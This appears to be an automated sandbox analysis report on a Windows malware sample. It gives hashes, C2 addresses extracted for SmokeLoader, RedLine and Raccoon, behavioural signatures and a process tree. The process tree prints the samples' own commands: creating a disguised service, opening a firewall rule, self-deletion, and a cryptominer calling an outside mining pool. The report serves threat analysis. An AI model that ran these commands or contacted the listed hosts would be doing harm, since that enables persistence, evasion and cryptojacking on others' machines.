Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    26-09-2021 17:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5ce23fd6639f4a6e53fb0b1c680dc0bfbd45533d43d8ca8feebf443b523a3e1c.exe

  • Size

    134KB

  • MD5

    a724f74717bcc081cf9ee74842f4ab7f

  • SHA1

    486eda597eed80d2e9e169feb98cfd7ff858fce3

  • SHA256

    5ce23fd6639f4a6e53fb0b1c680dc0bfbd45533d43d8ca8feebf443b523a3e1c

  • SHA512

    18c2d5166ed63a6d342c15c5ef00e9d6e014feb8cab2d7e7218461c84f54c4ee44086691ea0f02994a121d733850ce2468bab75a4447903dc3ca2f1231b8cda4

Score
10/10
arkeichinese_generic_botnetraccoonredlinesmokeloadertofseexmrig5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4a72c96f6762e4258a13dee8bc0dd14557df18467b2f2e53f9e27f901d453d8f6fbafe1b4d5266bb7blissf6d7183c9e82d2a9b81e6c0608450aa66cefb51finstallszxckarmabackdoorbotnetdiscoveryevasioninfostealerminerpersistencespywarestealersuricatathemidatrojan

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://naghenrietti1.top/

http://kimballiett2.top/

http://xadriettany3.top/

http://jebeccallis4.top/

http://nityanneron5.top/

http://umayaniela6.top/

http://lynettaram7.top/

http://sadineyalas8.top/

http://geenaldencia9.top/

http://aradysiusep10.top/
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

installszxc

C2

138.124.186.2:27999

Extracted

Family

raccoon

Botnet

a72c96f6762e4258a13dee8bc0dd14557df18467

Attributes
  • url4cnc

    https://t.me/h_wacel1new_1

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

f6d7183c9e82d2a9b81e6c0608450aa66cefb51f

Attributes
  • url4cnc

    https://t.me/justoprostohello

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

b2f2e53f9e27f901d453d8f6fbafe1b4d5266bb7

Attributes
  • url4cnc

    https://t.me/hcdrom1

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4

Attributes
  • url4cnc

    https://t.me/agrybirdsgamerept

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

Bliss

C2

185.237.98.178:62607

Extracted

Family

redline

Botnet

karma

C2

94.103.9.133:39323

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

    stealerarkei
  • Generic Chinese Botnet

    A botnet originating from China which is currently unnamed publicly.

    botnetchinese_generic_botnet
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata
  • suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)

    suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)

    suricata
  • suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

    suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

    suricata
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Arkei Stealer Payload 1 IoCs
    stealer
  • Chinese Botnet Payload 1 IoCs
    botnet
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • XMRig Miner Payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 14 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 13 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Modifies data under HKEY_USERS 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5ce23fd6639f4a6e53fb0b1c680dc0bfbd45533d43d8ca8feebf443b523a3e1c.exe
    "C:\Users\Admin\AppData\Local\Temp\5ce23fd6639f4a6e53fb0b1c680dc0bfbd45533d43d8ca8feebf443b523a3e1c.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Users\Admin\AppData\Local\Temp\5ce23fd6639f4a6e53fb0b1c680dc0bfbd45533d43d8ca8feebf443b523a3e1c.exe
      "C:\Users\Admin\AppData\Local\Temp\5ce23fd6639f4a6e53fb0b1c680dc0bfbd45533d43d8ca8feebf443b523a3e1c.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2568
  • C:\Users\Admin\AppData\Local\Temp\F226.exe
    C:\Users\Admin\AppData\Local\Temp\F226.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\ProgramData\Stub.exe
      "C:\ProgramData\Stub.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:660
  • C:\Users\Admin\AppData\Local\Temp\FA16.exe
    C:\Users\Admin\AppData\Local\Temp\FA16.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:524
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\FA16.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:428
      • C:\Windows\SysWOW64\timeout.exe
        timeout /T 10 /NOBREAK
        3⤵
        • Delays execution with timeout.exe
        PID:1312
  • C:\Users\Admin\AppData\Local\Temp\245.exe
    C:\Users\Admin\AppData\Local\Temp\245.exe
    1⤵
    • Executes dropped EXE
    PID:1100
  • C:\Users\Admin\AppData\Local\Temp\FD3.exe
    C:\Users\Admin\AppData\Local\Temp\FD3.exe
    1⤵
    • Executes dropped EXE
    PID:884
  • C:\Users\Admin\AppData\Local\Temp\18FC.exe
    C:\Users\Admin\AppData\Local\Temp\18FC.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:2760
  • C:\Users\Admin\AppData\Local\Temp\20FB.exe
    C:\Users\Admin\AppData\Local\Temp\20FB.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2408
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\20FB.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:532
      • C:\Windows\SysWOW64\timeout.exe
        timeout /T 10 /NOBREAK
        3⤵
        • Delays execution with timeout.exe
        PID:804
  • C:\Users\Admin\AppData\Local\Temp\27F2.exe
    C:\Users\Admin\AppData\Local\Temp\27F2.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    PID:2572
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 1336
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:864
  • C:\Users\Admin\AppData\Local\Temp\2DAF.exe
    C:\Users\Admin\AppData\Local\Temp\2DAF.exe
    1⤵
    • Executes dropped EXE
    PID:1088
    • C:\Users\Admin\AppData\Local\Temp\SindonsWelfare_2021-09-26_15-02.exe
      "C:\Users\Admin\AppData\Local\Temp\SindonsWelfare_2021-09-26_15-02.exe"
      2⤵
      • Executes dropped EXE
      PID:2160
    • C:\Users\Admin\AppData\Local\Temp\SolanumsYoghurt_2021-09-26_14-52.exe
      "C:\Users\Admin\AppData\Local\Temp\SolanumsYoghurt_2021-09-26_14-52.exe"
      2⤵
      • Executes dropped EXE
      PID:688
    • C:\Users\Admin\AppData\Local\Temp\fbf.exe
      "C:\Users\Admin\AppData\Local\Temp\fbf.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Enumerates connected drives
      • Checks processor information in registry
      • Suspicious use of SetWindowsHookEx
      PID:3868
  • C:\Users\Admin\AppData\Local\Temp\361D.exe
    C:\Users\Admin\AppData\Local\Temp\361D.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1780
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\unpkgwhl\
      2⤵
        PID:2940
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\psltrtbl.exe" C:\Windows\SysWOW64\unpkgwhl\
        2⤵
          PID:1784
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create unpkgwhl binPath= "C:\Windows\SysWOW64\unpkgwhl\psltrtbl.exe /d\"C:\Users\Admin\AppData\Local\Temp\361D.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:3776
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description unpkgwhl "wifi internet conection"
            2⤵
              PID:2396
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start unpkgwhl
              2⤵
                PID:2584
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:660
              • C:\Windows\SysWOW64\unpkgwhl\psltrtbl.exe
                C:\Windows\SysWOW64\unpkgwhl\psltrtbl.exe /d"C:\Users\Admin\AppData\Local\Temp\361D.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:2708
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  PID:3748
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                      PID:428

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • memory/428-281-0x0000000002CF0000-0x0000000002DE1000-memory.dmp

                  Filesize

                  964KB

                  Download

                • memory/524-142-0x00000000020D0000-0x0000000002160000-memory.dmp

                  Filesize

                  576KB

                  Download

                • memory/524-143-0x0000000000400000-0x00000000004F1000-memory.dmp

                  Filesize

                  964KB

                  Download

                • memory/660-138-0x0000000005770000-0x0000000005D76000-memory.dmp

                  Filesize

                  6.0MB

                  Download

                • memory/660-183-0x00000000080D0000-0x00000000080D1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/660-169-0x0000000007640000-0x0000000007641000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/660-167-0x0000000007480000-0x0000000007481000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/660-166-0x0000000008160000-0x0000000008161000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/660-128-0x0000000000FF0000-0x0000000000FF1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/660-130-0x0000000005D80000-0x0000000005D81000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/660-159-0x0000000007290000-0x0000000007291000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/660-168-0x00000000075A0000-0x00000000075A1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/660-131-0x0000000005800000-0x0000000005801000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/660-157-0x0000000007730000-0x0000000007731000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/660-132-0x0000000005930000-0x0000000005931000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/660-133-0x0000000005860000-0x0000000005861000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/660-150-0x0000000007030000-0x0000000007031000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/660-137-0x00000000058A0000-0x00000000058A1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/688-247-0x0000000002370000-0x0000000002393000-memory.dmp

                  Filesize

                  140KB

                  Download

                • memory/688-250-0x0000000002400000-0x0000000002422000-memory.dmp

                  Filesize

                  136KB

                  Download

                • memory/688-264-0x0000000000600000-0x000000000074A000-memory.dmp

                  Filesize

                  1.3MB

                  Download

                • memory/688-269-0x0000000000400000-0x00000000004CB000-memory.dmp

                  Filesize

                  812KB

                  Download

                • memory/688-274-0x0000000004BD2000-0x0000000004BD3000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/688-272-0x0000000004BD0000-0x0000000004BD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/688-278-0x0000000004BD4000-0x0000000004BD6000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/688-275-0x0000000004BD3000-0x0000000004BD4000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/884-151-0x0000000001640000-0x0000000001641000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/884-152-0x0000000003200000-0x0000000003201000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/884-153-0x0000000003220000-0x0000000003221000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/884-154-0x0000000003230000-0x0000000003231000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/884-155-0x0000000003240000-0x0000000003241000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/884-156-0x0000000003250000-0x0000000003251000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/884-158-0x0000000000960000-0x00000000010F3000-memory.dmp

                  Filesize

                  7.6MB

                  Download

                • memory/1088-197-0x0000000000870000-0x0000000000871000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1100-145-0x00000000021E0000-0x0000000002270000-memory.dmp

                  Filesize

                  576KB

                  Download

                • memory/1100-146-0x0000000000400000-0x00000000004F0000-memory.dmp

                  Filesize

                  960KB

                  Download

                • memory/1588-118-0x0000000000880000-0x0000000000896000-memory.dmp

                  Filesize

                  88KB

                  Download

                • memory/1780-223-0x0000000000400000-0x00000000004AE000-memory.dmp

                  Filesize

                  696KB

                  Download

                • memory/1780-222-0x0000000000590000-0x00000000005A3000-memory.dmp

                  Filesize

                  76KB

                  Download

                • memory/2160-252-0x0000000002590000-0x00000000025AE000-memory.dmp

                  Filesize

                  120KB

                  Download

                • memory/2160-277-0x0000000004C33000-0x0000000004C34000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2160-270-0x00000000005C0000-0x000000000070A000-memory.dmp

                  Filesize

                  1.3MB

                  Download

                • memory/2160-267-0x0000000004C34000-0x0000000004C36000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/2160-273-0x0000000004C30000-0x0000000004C31000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2160-271-0x0000000000400000-0x00000000004C5000-memory.dmp

                  Filesize

                  788KB

                  Download

                • memory/2160-276-0x0000000004C32000-0x0000000004C33000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2160-248-0x00000000022A0000-0x00000000022BF000-memory.dmp

                  Filesize

                  124KB

                  Download

                • memory/2372-115-0x0000000000690000-0x0000000000699000-memory.dmp

                  Filesize

                  36KB

                  Download

                • memory/2408-200-0x0000000000400000-0x00000000004F0000-memory.dmp

                  Filesize

                  960KB

                  Download

                • memory/2408-199-0x0000000002160000-0x00000000021F0000-memory.dmp

                  Filesize

                  576KB

                  Download

                • memory/2568-116-0x0000000000400000-0x0000000000409000-memory.dmp

                  Filesize

                  36KB

                  Download

                • memory/2572-190-0x00000000004E0000-0x000000000062A000-memory.dmp

                  Filesize

                  1.3MB

                  Download

                • memory/2572-191-0x0000000000400000-0x000000000044D000-memory.dmp

                  Filesize

                  308KB

                  Download

                • memory/2708-236-0x00000000005A0000-0x00000000006EA000-memory.dmp

                  Filesize

                  1.3MB

                  Download

                • memory/2708-237-0x0000000000400000-0x00000000004AE000-memory.dmp

                  Filesize

                  696KB

                  Download

                • memory/2708-122-0x0000000000F30000-0x0000000000F31000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2708-124-0x00000000057D0000-0x00000000057D1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2760-179-0x0000000005550000-0x0000000005551000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/2760-178-0x0000000077000000-0x000000007718E000-memory.dmp

                  Filesize

                  1.6MB

                  Download

                • memory/2760-171-0x00000000010D0000-0x00000000010D1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3748-232-0x00000000005E0000-0x00000000005F5000-memory.dmp

                  Filesize

                  84KB

                  Download

                • memory/3868-279-0x0000000010000000-0x0000000010018000-memory.dmp

                  Filesize

                  96KB

                  Download

                • memory/3868-262-0x0000000000400000-0x00000000004C4000-memory.dmp

                  Filesize

                  784KB

                  Download

                • memory/3868-259-0x00000000021A0000-0x000000000225C000-memory.dmp

                  Filesize

                  752KB

                  Download